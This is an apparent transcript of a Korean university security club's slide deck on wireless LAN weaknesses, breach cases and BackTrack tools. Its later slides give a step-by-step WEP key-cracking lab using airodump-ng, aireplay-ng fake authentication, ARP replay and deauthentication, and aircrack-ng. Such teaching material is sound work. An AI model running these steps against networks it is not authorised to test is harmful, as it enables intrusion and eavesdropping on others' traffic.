Presentation is loading. Please wait.

Presentation is loading. Please wait.

WLAN의 취약점과 백트랙 SKKU 정보보안 동아리 H.I.T..

Similar presentations


Presentation on theme: "WLAN의 취약점과 백트랙 SKKU 정보보안 동아리 H.I.T.."— Presentation transcript:

1 WLAN의 취약점과 백트랙 SKKU 정보보안 동아리 H.I.T.

2 목차 WLAN을 공격하는 이유 Wireless Network? 해킹 사고 사례 BACKTRACK 실습

3 WLAN을 공격하는 이유 유선 네트워크에 비해 상대적으로 약한 보안 Broad Casting
전파가 도달 가능한 거리에 있는 경우 어디에서든지 스니핑과 침투 공격이 가능함

4 WLAN을 공격하는 이유 공격자 위치 추적의 어려움 너무나도 많은 AP들
자동차, 자전거 심한 경우 마트 카트 로켓, 등 이동수단을 이용하여, 이동하며 무선랜 지역을 찾고 Sniffing하는 행위가 빈번히 발생

5 WLAN을 공격하는 이유

6 Wireless Network? IEEE 802.11 구성요소 AP = Access Point Client SSID란?
무선네트워크에서 각각의 네트워크를 구별시키는 식별자

7 Wireless Network?

8 해킹 사고 사례 - 1 TJX Companies, INC 2007년 고객정보 유출 사건 언론에 공대
피해규모 : 신용카드 정보를 포함한 최소 4,570만건 의 고객정보

9 해킹 사고 사례 - 2

10 해킹 사고 사례 - 3 무선랜 보안의 취약함 2009년 국제 해킹대회인 “코드게이트” 에서 보안설정을 강력하게 해놓은 무선랜 해킹 문제를 한 팀에서 23분여 만에 해킹에 성공함 가장 낮은 보안 단계인 WEP는 털리는데 60sec 미만 WPA도 GPU나 여러 개의 CPU 사용으로 터는 시간이 단축

11 WLAN Hacking Tools

12 BACKTRACK All in One!! == BackTrack

13 WLAN 해킹의 유형 도청 서비스 거부 공격 [DDoS] 중간자 공격 세션 가로채기 [Session Hijacking]

14 WLAN 해킹의 유형

15 WLAN 해킹의 유형 불법/비인가 Clients 불완전 요소 제거 무선 네트워크 직접공격

16 WLAN 해킹의 유형 Rogue AP (= HoneySpot) 추적 위협 제거 공인된 사용자 정보 획득

17 백트랙을 이용한 WEP Password 탈취 실습
백트랙 LAN 모드를 Monitor 모드로 변경 자신의 단말 장치로 날라오는 모든 패킷을 수집할 수 있게 된다. 주변 AP 확인 Airodump-ng –w [파일 이름] mon0

18 백트랙을 이용한 WEP Password 탈취 실습
주변 AP확인 후 공격할 AP 정한다. 이 때 자신의 MAC 주소도 기억

19 백트랙을 이용한 WEP Password 탈취 실습
Target AP dump 실행 airodump-ng --bssid [AP 맥 주소] -c [채널] -w [저장할 파일 이름] mon0 dump를 이용하면 cap파일이 생성되면서 정보들이 cap파일에 저장되고 이 저장된 파일(IV들)을 이용해서 키를 알아내게 된다.

20 백트랙을 이용한 WEP Password 탈취 실습
가짜 인증 aireplay-ng e [AP 이름] -a [AP 맥 주소] -n [공격자 맥 주소] mon0 내가 공격을 하려는 AP로 공격자의 AP가 접속이 되어 있는 상태가 된다.

21 백트랙을 이용한 WEP Password 탈취 실습
Arp request replay attack aireplay-ng -3 -b [AP 맥 주소] -n [공격자 맥 주소] mon0 공격을 위해 패스워드 길이에 따라 2~8만개의 패킷을 수집해야 한다. 해당 공격으로 data값이 증가하면서 IV 확보가 쉬워짐 트래픽이 있어야 가능한 공격이므로 aireplay-ng a [AP MAC 주소] mon0을 수행해서 트래픽을 발생

22 백트랙을 이용한 WEP Password 탈취 실습

23 백트랙을 이용한 WEP Password 탈취 실습
재인증 aireplay-ng a [AP 맥 주소] mon0 Crack aircrack-ng [위에서 저장한 dump파일 확장자는 cap

24 백트랙을 이용한 WEP Password 탈취 실습
백트랩에 들어있는 다양한 공격 옵션들 aireplay <option> <replay interface> -0 : deauthentication -1 : Fake authentication -2 : Interactive Packet replay -3 : ARP request replay attack -4 : KoreK chopchop attack -5 : Fragmentation attack -6~-8 : 현재 개발 중인 다른 공격 기법이 들어갈 자리 -b bssid : AP의 MAC 주소가 bssid인 패킷으로 제한(-4, -5 사용시) -a bssid : AP MAC 주소 입력 -h smac : 공격자 MAC 주소 입력

25 백트랙을 이용한 WEP Password 탈취 실습
그 외 백트랙의 다양한 공격 기법 Caffe-Latte Attack 시연 동영상

26 결론

27 감사합니다!! 발표자 : 장동훈 질문은 술자리에서 하는 것이네 친구… shings47@naver.com
Shings47.tistroy.com @Hyena_anthem 전쟁 1섭 아즈샤라 사냥꾼Lv.80 폭탄마 드루이드Lv.80 달려라야수왕 주술사Lv.73 자연왕


Download ppt "WLAN의 취약점과 백트랙 SKKU 정보보안 동아리 H.I.T.."

Similar presentations


Ads by Google